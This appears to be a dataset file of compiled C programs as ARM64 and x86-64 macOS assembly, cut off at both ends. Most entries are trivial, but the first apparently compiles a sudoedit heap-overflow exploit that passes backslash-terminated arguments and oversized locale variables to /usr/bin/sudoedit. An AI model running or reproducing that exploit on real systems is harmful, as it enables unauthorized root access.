adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
bl ___stack_chk_fail
LBB0_2:
add sp, sp, #2320
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\\"
l_.str.1: ; @.str.1
.asciz "sudoedit"
l_.str.2: ; @.str.2
.asciz "-s"
.section __TEXT,__const
l___const.main.messages: ; @__const.main.messages
.asciz "LC_MESSAGES=en_US.UTF-8@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
l___const.main.telephone: ; @__const.main.telephone
.asciz "LC_TELEPHONE=C.UTF-8@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
l___const.main.measurement: ; @__const.main.measurement
.asciz "LC_MEASUREMENT=C.UTF-8@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
l_.str.3: ; @.str.3
.asciz "XXXXXXX\\"
l_.str.4: ; @.str.4
.asciz "x/x\\"
l_.str.5: ; @.str.5
.asciz "Z"
l_.str.6: ; @.str.6
.asciz "/usr/bin/sudoedit"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $2240, %rsp ## imm = 0x8C0
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
leaq -256(%rbp), %rdi
xorl %esi, %esi
movl $240, %edx
callq _memset
leaq -256(%rbp), %rdi
movl $89, %esi
movl $224, %edx
callq _memset
leaq -256(%rbp), %rdi
leaq L_.str(%rip), %rsi
movl $240, %edx
callq ___strcat_chk
leaq L_.str.1(%rip), %rax
movq %rax, -288(%rbp)
leaq L_.str.2(%rip), %rax
movq %rax, -280(%rbp)
leaq -256(%rbp), %rax
movq %rax, -272(%rbp)
movq $0, -264(%rbp)
leaq -512(%rbp), %rdi
leaq l___const.main.messages(%rip), %rsi
movl $224, %edx
callq _memcpy
leaq -512(%rbp), %rax
movq %rax, -2240(%rbp) ## 8-byte Spill
leaq -512(%rbp), %rdi
callq _strlen
movq -2240(%rbp), %rdi ## 8-byte Reload
addq %rax, %rdi
movl $65, %esi
movl $184, %edx
callq _memset
leaq -592(%rbp), %rdi
leaq l___const.main.telephone(%rip), %rsi
movl $80, %edx
callq _memcpy
leaq -592(%rbp), %rax
movq %rax, -2232(%rbp) ## 8-byte Spill
leaq -592(%rbp), %rdi
callq _strlen
movq -2232(%rbp), %rdi ## 8-byte Reload
addq %rax, %rdi
movl $65, %esi
movl $40, %edx
callq _memset
leaq -672(%rbp), %rdi
leaq l___const.main.measurement(%rip), %rsi
movl $80, %edx
callq _memcpy
leaq -672(%rbp), %rax
movq %rax, -2224(%rbp) ## 8-byte Spill
leaq -672(%rbp), %rdi
callq _strlen
movq -2224(%rbp), %rdi ## 8-byte Reload
addq %rax, %rdi
movl $65, %esi
movl $40, %edx
callq _memset
leaq -1952(%rbp), %rdi
xorl %esi, %esi
movl $1280, %edx ## imm = 0x500
callq _memset
leaq -1952(%rbp), %rdi
movl $88, %esi
movl $1231, %edx ## imm = 0x4CF
callq _memset
leaq -1952(%rbp), %rdi
leaq L_.str(%rip), %rsi
movl $1280, %edx ## imm = 0x500
callq ___strcat_chk
leaq -1952(%rbp), %rax
movq %rax, -2208(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2200(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2192(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2184(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2176(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2168(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2160(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2152(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2144(%rbp)
leaq L_.str.3(%rip), %rax
movq %rax, -2136(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2128(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2120(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2112(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2104(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2096(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2088(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2080(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2072(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2064(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2056(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2048(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2040(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2032(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2024(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -2016(%rbp)
leaq L_.str.4(%rip), %rax
movq %rax, -2008(%rbp)
leaq L_.str.5(%rip), %rax
movq %rax, -2000(%rbp)
leaq -512(%rbp), %rax
movq %rax, -1992(%rbp)
leaq -592(%rbp), %rax
movq %rax, -1984(%rbp)
leaq -672(%rbp), %rax
movq %rax, -1976(%rbp)
movq $0, -1968(%rbp)
leaq -288(%rbp), %rsi
leaq -2208(%rbp), %rdx
leaq L_.str.6(%rip), %rdi
callq _execve
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_2
## %bb.1:
addq $2240, %rsp ## imm = 0x8C0
popq %rbp
retq
LBB0_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\\"
L_.str.1: ## @.str.1
.asciz "sudoedit"
L_.str.2: ## @.str.2
.asciz "-s"
.section __TEXT,__const
.p2align 4 ## @__const.main.messages
l___const.main.messages:
.asciz "LC_MESSAGES=en_US.UTF-8@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.p2align 4 ## @__const.main.telephone
l___const.main.telephone:
.asciz "LC_TELEPHONE=C.UTF-8@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.p2align 4 ## @__const.main.measurement
l___const.main.measurement:
.asciz "LC_MEASUREMENT=C.UTF-8@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
.section __TEXT,__cstring,cstring_literals
L_.str.3: ## @.str.3
.asciz "XXXXXXX\\"
L_.str.4: ## @.str.4
.asciz "x/x\\"
L_.str.5: ## @.str.5
.asciz "Z"
L_.str.6: ## @.str.6
.asciz "/usr/bin/sudoedit"
.subsections_via_symbols
| the_stack_data/51889.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #8
str x8, [x9]
sub x8, x29, #12
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
b LBB0_4
LBB0_3:
b LBB0_5
LBB0_4:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_6
LBB0_5:
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_6
LBB0_6:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter two numbers. "
l_.str.1: ; @.str.1
.asciz "%d %d"
l_.str.2: ; @.str.2
.asciz "Either of the number is negative. "
l_.str.3: ; @.str.3
.asciz "Both of the numbers are positive. "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
leaq -12(%rbp), %rdx
movb $0, %al
callq _scanf
cmpl $0, -8(%rbp)
jl LBB0_2
## %bb.1:
cmpl $0, -12(%rbp)
jge LBB0_3
LBB0_2:
jmp LBB0_4
LBB0_3:
jmp LBB0_5
LBB0_4:
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_6
LBB0_5:
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
LBB0_6:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter two numbers. "
L_.str.1: ## @.str.1
.asciz "%d %d"
L_.str.2: ## @.str.2
.asciz "Either of the number is negative. "
L_.str.3: ## @.str.3
.asciz "Both of the numbers are positive. "
.subsections_via_symbols
| the_stack_data/150343.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
mov w0, #2
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function unused_func
_unused_func: ; @unused_func
.cfi_startproc
; %bb.0:
mov w0, #1
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $2, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function unused_func
_unused_func: ## @unused_func
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $1, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/14199174.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x1, [x29, #-16]
mov x0, #0
bl _time
; kill: def $w0 killed $w0 killed $x0
bl _srand
ldur x8, [x29, #-16]
ldr x0, [x8, #8]
bl _atoi
stur w0, [x29, #-20]
bl _rand
mov w9, #2
sdiv w8, w0, w9
mul w8, w8, w9
subs w8, w0, w8
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
stur w8, [x29, #-24]
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-28]
stur wzr, [x29, #-32]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-32]
subs w8, w8, #50
cset w8, ge
tbnz w8, #0, LBB0_5
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-32]
; implicit-def: $x12
mov x12, x8
mov x8, x12
add w8, w8, #1
stur w8, [x29, #-32]
ldur w8, [x29, #-24]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-28]
; implicit-def: $x8
mov x8, x9
mov x9, sp
mov x11, #1
str x11, [x9]
str x12, [x9, #8]
str x11, [x9, #16]
str x10, [x9, #24]
str x8, [x9, #32]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldur w8, [x29, #-24]
subs w8, w8, #1024
cset w8, lt
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
b LBB0_5
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB0_1
LBB0_5:
ldur w8, [x29, #-24]
ldur w9, [x29, #-28]
subs w8, w8, w9
cset w9, eq
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
adrp x0, l___func__.main@PAGE
add x0, x0, l___func__.main@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
mov w2, #20
adrp x3, l_.str.2@PAGE
add x3, x3, l_.str.2@PAGEOFF
bl ___assert_rtn
LBB0_7:
b LBB0_8
LBB0_8:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d , %d , %d , %d , %d \n"
l___func__.main: ; @__func__.main
.asciz "main"
l_.str.1: ; @.str.1
.asciz "200142785.c"
l_.str.2: ; @.str.2
.asciz "x != y"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
xorl %eax, %eax
movl %eax, %edi
callq _time
movl %eax, %edi
callq _srand
movq -16(%rbp), %rax
movq 8(%rax), %rdi
callq _atoi
movl %eax, -20(%rbp)
callq _rand
movl $2, %ecx
cltd
idivl %ecx
cmpl -20(%rbp), %edx
setl %al
andb $1, %al
movzbl %al, %eax
movl %eax, -24(%rbp)
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
movl $0, -32(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $50, -32(%rbp)
jge LBB0_5
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -32(%rbp), %edx
movl %edx, %eax
addl $1, %eax
movl %eax, -32(%rbp)
movl -24(%rbp), %r8d
movl -28(%rbp), %r9d
leaq L_.str(%rip), %rdi
movl $1, %ecx
movl %ecx, %esi
movb $0, %al
callq _printf
cmpl $1024, -24(%rbp) ## imm = 0x400
jl LBB0_4
## %bb.3:
jmp LBB0_5
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB0_1
LBB0_5:
movl -24(%rbp), %eax
cmpl -28(%rbp), %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_7
## %bb.6:
leaq L___func__.main(%rip), %rdi
leaq L_.str.1(%rip), %rsi
leaq L_.str.2(%rip), %rcx
movl $20, %edx
callq ___assert_rtn
LBB0_7:
jmp LBB0_8
LBB0_8:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d , %d , %d , %d , %d \n"
L___func__.main: ## @__func__.main
.asciz "main"
L_.str.1: ## @.str.1
.asciz "200142785.c"
L_.str.2: ## @.str.2
.asciz "x != y"
.subsections_via_symbols
| the_stack_data/200142785.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
mov x8, x0
mov w0, #0
str wzr, [sp, #12]
str w8, [sp, #8]
str x1, [sp]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/162642070.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
mov w1, #0
str w1, [sp, #28] ; 4-byte Folded Spill
str wzr, [sp, #44]
add x0, sp, #48
str x0, [sp, #16] ; 8-byte Folded Spill
mov x2, #40
str x2, [sp, #32] ; 8-byte Folded Spill
bl _memset
ldr x0, [sp, #16] ; 8-byte Folded Reload
ldr w1, [sp, #28] ; 4-byte Folded Reload
ldr x2, [sp, #32] ; 8-byte Folded Reload
mov w8, #-1
str w8, [sp, #48]
bl _memset
str wzr, [sp, #40]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #40]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldrsw x9, [sp, #40]
add x8, sp, #48
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
mov w8, #1
str w8, [sp, #44]
b LBB0_7
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #40]
add w8, w8, #1
str w8, [sp, #40]
b LBB0_1
LBB0_6:
str wzr, [sp, #44]
b LBB0_7
LBB0_7:
ldr w8, [sp, #44]
str w8, [sp, #12] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8:
bl ___stack_chk_fail
LBB0_9:
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -52(%rbp)
leaq -48(%rbp), %rdi
xorl %esi, %esi
movl $40, %edx
callq _memset
movl $-1, -48(%rbp)
leaq -48(%rbp), %rdi
xorl %esi, %esi
movl $40, %edx
callq _memset
movl $0, -56(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -56(%rbp)
jge LBB0_6
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movslq -56(%rbp), %rax
cmpl $0, -48(%rbp,%rax,4)
je LBB0_4
## %bb.3:
movl $1, -52(%rbp)
jmp LBB0_7
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_5
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB0_1
LBB0_6:
movl $0, -52(%rbp)
LBB0_7:
movl -52(%rbp), %eax
movl %eax, -60(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_9
## %bb.8:
movl -60(%rbp), %eax ## 4-byte Reload
addq $64, %rsp
popq %rbp
retq
LBB0_9:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/181392236.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x9, sp
mov x8, #-1
str x8, [x9]
mov w0, #111
bl _syscall
stur w0, [x29, #-8]
ldur w8, [x29, #-8]
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
bl ___error
ldr w8, [x0]
subs w8, w8, #14
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
stur x8, [x29, #-16] ; 8-byte Folded Spill
bl ___error
ldur x10, [x29, #-16] ; 8-byte Folded Reload
ldr w9, [x0]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov w8, #1
stur w8, [x29, #-4]
b LBB0_10
LBB0_3:
mov x9, sp
mov x8, #3
str x8, [x9]
mov x8, #-1
str x8, [x9, #8]
str x8, [x9, #16]
mov w0, #48
bl _syscall
stur w0, [x29, #-8]
ldur w8, [x29, #-8]
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4:
bl ___error
ldr w8, [x0]
subs w8, w8, #14
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
stur x8, [x29, #-24] ; 8-byte Folded Spill
bl ___error
ldur x10, [x29, #-24] ; 8-byte Folded Reload
ldr w9, [x0]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w8, #1
stur w8, [x29, #-4]
b LBB0_10
LBB0_6:
mov x9, sp
mov x8, #30
str x8, [x9]
mov x8, #-1
str x8, [x9, #8]
str x8, [x9, #16]
mov w0, #46
bl _syscall
stur w0, [x29, #-8]
ldur w8, [x29, #-8]
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
bl ___error
ldr w8, [x0]
subs w8, w8, #14
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8:
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
str x8, [sp, #32] ; 8-byte Folded Spill
bl ___error
ldr x10, [sp, #32] ; 8-byte Folded Reload
ldr w9, [x0]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov w8, #1
stur w8, [x29, #-4]
b LBB0_10
LBB0_9:
stur wzr, [x29, #-4]
b LBB0_10
LBB0_10:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "SYS_sigsuspend did not return EFAULT: ret=%d, errno=%d\n"
l_.str.1: ; @.str.1
.asciz "SYS_sigprocmask did not return EFAULT: ret=%d, errno=%d\n"
l_.str.2: ; @.str.2
.asciz "SYS_sigaction did not return EFAULT: ret=%d, errno=%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl $111, %edi
movl $4294967295, %esi ## imm = 0xFFFFFFFF
movb $0, %al
callq _syscall
movl %eax, -8(%rbp)
cmpl $-1, -8(%rbp)
jne LBB0_2
## %bb.1:
callq ___error
cmpl $14, (%rax)
je LBB0_3
LBB0_2:
movl -8(%rbp), %eax
movl %eax, -12(%rbp) ## 4-byte Spill
callq ___error
movl -12(%rbp), %esi ## 4-byte Reload
movl (%rax), %edx
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -4(%rbp)
jmp LBB0_10
LBB0_3:
movl $48, %edi
movl $3, %esi
movl $4294967295, %ecx ## imm = 0xFFFFFFFF
movl %ecx, %edx
movb $0, %al
callq _syscall
movl %eax, -8(%rbp)
cmpl $-1, -8(%rbp)
jne LBB0_5
## %bb.4:
callq ___error
cmpl $14, (%rax)
je LBB0_6
LBB0_5:
movl -8(%rbp), %eax
movl %eax, -16(%rbp) ## 4-byte Spill
callq ___error
movl -16(%rbp), %esi ## 4-byte Reload
movl (%rax), %edx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -4(%rbp)
jmp LBB0_10
LBB0_6:
movl $46, %edi
movl $30, %esi
movl $4294967295, %ecx ## imm = 0xFFFFFFFF
movl %ecx, %edx
movb $0, %al
callq _syscall
movl %eax, -8(%rbp)
cmpl $-1, -8(%rbp)
jne LBB0_8
## %bb.7:
callq ___error
cmpl $14, (%rax)
